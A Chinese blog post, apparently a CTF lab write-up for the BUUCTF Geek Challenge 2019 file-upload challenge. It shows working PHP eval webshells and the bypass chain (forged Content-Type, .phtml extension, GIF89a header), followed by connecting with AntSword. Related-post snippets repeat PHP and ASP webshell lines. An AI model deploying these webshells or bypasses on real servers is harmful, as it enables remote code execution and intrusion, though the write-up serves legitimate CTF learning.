buuctf web 极客大挑战2019 Upload

最新推荐文章于 2022-08-31 16:18:36 发布
最新推荐文章于 2022-08-31 16:18:36 发布
阅读量642 收藏 2
点赞数 1
分类专栏: BUUCTF 文章标签: php html web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ethan552525/article/details/120050487
版权

题目:

 解题:

1:上传“一句话木马”文件

        编辑文件a.php:

<?php @eval($_POST['shell']);?>

         上传后得到:

         Not image!  提示需要上传文件为 image。

2:修改Content-Type

        上传a.php文件时,用burp suite抓包得到:

         修改Content-Type为 image/gif

        提示:NOT ! php !,说明不能后缀为php。 

 phtml文件

        在嵌入了php脚本的html中,使用 phtml作为后缀名;完全是php写的,则使用php作为后缀名。这两种文件,web服务器都会用php解释器进行解析。

 3:修改文件后缀为a.phtml

        修改a.php为a.phtml后:

        提示: NO! HACKER! your file included '&#x3C;&#x3F;'

html实体字符

        HTML 中规定了 Character entity references,也就是通常我们说得 html实体字符,一些字符在 HTML 中拥有特殊的含义,比如小于号 (<) 用于定义 HTML 标签的开始。如果我们希望浏览器正确地显示这些字符,我们必须在 HTML 源码中插入字符实体。

        字符实体有三部分:一个和号 (&),一个实体名称,或者 # 和一个实体编号,以及一个分号 (;)。要在 HTML 文档中显示小于号,我们需要这样写:&lt; 或者 &#60。

        &#x3C;  代表:<,&#x3F;  代表:?

        也就是说上传文件里不能包含:" <? "     

4:绕过" <? "限制          

        用 script标签 绕过“<?”限制:<script language='php'>@eval($_POST['cmd']);</script>

        提示:Don't lie to me, it's not image at all!!!

        即:上传的根本不是图片。

5:GIF89a 图片头文件欺骗

        在文件前面加文件头:GIF89a,php会检测其为gif图片。使用getimagesize函数无法判断其图片是无效的。

        成功上传“一句话”木马。

6:蚁剑连接

       上传文件一般都在upload目录下。

        URL地址http://4a46933f-3f6c-4946-8725-44c2ac48e1e5.node4.buuoj.cn:81/upload/a.phtml

        连接密码:cmd

        在根目录下找到flag文件,打开即得flag。

 

Ethan552525
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-Web】[极客挑战 2019]Upload
weixin_49298681的博客
01-05 1037
Upload=> 文件上传漏洞。
【文件上传】buu_[极客挑战2019]Upload
serendipity1130的博客
08-28 175
考点:上传可以解析的phtml文件 1.上传时发现只能上传jpg,png等图片格式,新建一个phtml的文件写上一句话木马,密码为shell,使用burp抓包,在content-type处将类型改为:image/jpeg,然后重发。 2.在上传路径下,找到这个文件:http://1ee7c2a9-3b23-435d-9030-35500ddff74c.node4.buuoj.cn/upload/mum.phtml 3.用菜刀连接,反正我用蚁剑可以连上,但是在根目录下找不到flag,菜刀可以。 .
BUUCTFUpload [极客挑战 2019]
金 帛的博客
04-19 1242
BUUCTF的WP
BUUCTF Web [极客挑战 2019]Upload & [ACTF2020 新生赛]Upload
最新发布
网安小趴菜
08-31 580
BUUCTF Web [极客挑战 2019]Upload 和[ACTF2020 新生赛]Upload
buuctf-web-[极客挑战 2019]Upload1
mlws1900的博客
08-11 1340
第一个点,修改phtml,第二个点GIF89a(这个点特别的重要,上面我写的代码没有包含),第三个点要用包含。scriptcmd.phtml是我们上传的webshell。我写的webshell里面加了phpinfo();上传的文件夹upload,找到我们上传的文件。bp后缀名修改phtml,加上下面代码。先上传一个无内容的jpg文件。文件里面要加GIF89a。蚁剑连接,获得flag。上传了一个小马代码为。...
BUUCTF-WEB-[极客挑战 2019]Upload
r1727337824的博客
09-06 523
BUUCTF-WEB-[极客挑战 2019]Upload
BUUCTF [极客挑战 2019]Knife
CrotZZ的博客
07-05 678
打开一看结合题目,就是连接一下菜刀蚁剑,菜刀没用过只有蚁剑,下面用蚁剑实现 设置好URL和链接密码 找到flag文件 打开后找到flag 文件上传漏洞 一句话木马: php <?php echo @eval($_POST['shell']);?> Asp <%execute(request(“value”))%> Aspx <%@ Page Language=“Jscript”%> <%eval(Request.Item[“value”])%> 前端判.
BUUCTF之BabySQL[极客挑战 2019]
金 帛的博客
06-11 445
BUUCTF记录贴
[BUUCTF]---web之[极客挑战 2019]Secret File
weixin_44164784的博客
04-14 406
欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体...
Buuctf 极客挑战 upload
Dexret的博客
12-07 2543
打开该靶机,为一个上传图片的网站 尝试了一下上传php文件改Content-Type,.htaccess以及ini文件,都不能成功 百度了一下还有一种文件名后缀可以绕过 .phtml文件告诉网络服务器,这些文件是由服务器生成的带有动态内容的html文件,就像浏览器中的.php文件表现一样。 因此,在高效使用中,您应该体验到.phtml与.php文件没有任何区别。 这是一个文件ext,一些人用了一段时间来表示它是PHP生成的HTML。 修改shell.php为shell.phtml,内容为:
BUUCTF [极客挑战 2020] Roamphp1-Welcome
Senimo
12-21 1272
BUUCTF [极客挑战 2020] Roamphp1-Welcome 考点: POST传参方式 sha1()不能加密数组 启动题目: 等了一阵子,一直是这样,查阅其他wp得知,原题中提示有:换一种请求方式 使用BurpSuite抓去数据包: 将传参方式修改为POST,发送数据包,得到题目源码: error_reporting(0); if ($_SERVER['REQUEST_METHOD'] !== 'POST') { header("HTTP/1.1 405 Method Not Allow
wasm逆向——(极客挑战2021wasm
weixin_52369224的博客
11-28 6446
WebAssembly是一种全新的Web编程语言,但是与JavaScript不同,它不是一种让你直接手动编写的语言,而是C / C ++,Rust,C#和TypeScript等不断增加的上层语言的编译目标。 wasm是基于堆栈的虚拟机的二进制指令格式 wabt包安装 尝试了gitclone的方法,一直没安装成功,尝试: sudo apt install wabt 我的环境:ubuntu20.4 WABT(我们将其称为“ wabbit”)是用于WebAssembly的一套工具,包括: wa.
Tamevic’s Ctf-Web writeup@BUUCTF Web合集(更新中...)
Tamevic的博客
06-20 866
Tamevic’s Ctf-Web writeup@BUUCTF Web 前言 大学所有课程都结束了,接下来还有考试和其他一些安排就要毕业了。从大二开始一直在说什么时候能有大块空闲时间好好学学ctf,但是课程安排比较紧张,一直没得空。现在好不容易有了大块时间,说开始就开始。 这次选择BUUCTFWeb题,这里题目基本都是历年各大赛事的原题,质量比较高,便于积累。 HCTF2018 WarmUp 环境一起就是一个滑稽…查看源码,提示去看source.php source.php里是源码 经过百度得知这
BUUCTF:[极客挑战 2019]EasySQL
Starbright.的博客
10-29 1393
账户: admin 'or '1'='1'# 万能密码: 'or '1'='1'# ' or 1='1
文件包含、文件上传漏洞
CyhDl666的博客
01-28 1650
文章目录文件包含漏洞1.[HCTF 2018]WarmUp2.[ACTF2020 新生赛]Include3.[极客挑战 2019]Secret File4.[BJDCTF2020]ZJCTF 不过如此 文件包含漏洞 不多说了 直接做题 1.[HCTF 2018]WarmUp F12进入source.php文件 <?php highlight_file(__FILE__); class emmm { public static function che
BUUCTF-[极客挑战 2019]Upload1
Monica的博客
09-14 1883
题目: 分析: 一个文件上传漏洞 上传一个1.php文件内容为:<?php eval($_POST[1]);?> 发现报错。 查看源代码,没有关于过滤的代码,说明是后端进行的过滤。 bp抓包:修改MIME 报错说不能是php文件、绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 发现只要phtml文件可以使用,修改后缀为phtml phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 PHT文件是一个HTM.
“百度杯”CTF比赛 九月场——Web-Upload
Ifish的博客
05-28 2618
题目描述 解题思路 看到提示,随意上传文件,并且flag在flag.php中,创建赛题,打开链接 就简单上传一个一句话上去 &amp;amp;lt;?php @eval($_POST[&amp;quot;code&amp;quot;]); ?&amp;amp;gt; 结果显示上传成功,但是,发现把“&amp;amp;lt;”和”php ”给过滤掉了 那我们就很自然的想到PHP的长标签了 重新修改代码 &amp;am
CTF--WEB--文件上传
yanfangjie的博客
01-06 3746
前端验证 上传一个一句话木马,扩展名改成允许上传的扩展名。 在把.jpg改成.php 上传的路径在这里 我们可以使用蚁剑来连接 连接成功,得到flag。
web buuctf [极客挑战 2019]Upload1
weixin_44214568的博客
09-04 565
1.随便上传一个东西,我上传的是一个txt文档,提示 "not image"; 2.不是图片格式,那就抓包改消息头 改为 : 上传后提示“don't lie to me,it's not image at all!" 应该是存在过滤,试试其他的格式: 改成php,提示“not php!” 改成php3,提示"not php3!" 之后又试了一下php4,也是不行, 最后试了一下phtml,提示“don't lie to me,it's not image at all!" 这样发现
BUUCTF-WEB-Upload[详细wp]
sGanYu
09-19 2501
关于文件上传的题目 首先上传一句话.php文件,结果显示not image <?php @eval($_REQUEST['password']);?> 猜测当我们上传文件的时候,被标识的文件类型被过滤,即尝试MiMe绕过 MiMe是什么:MIME由一串简单的字符串组成,初期标识了邮件e-mail的附件的类型,后来在html文件中可以使用content-type属性表示,描述了这个文件类型的。 MiMe常见的格式 AUDIO/WAV WAVE音频流媒体文件 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值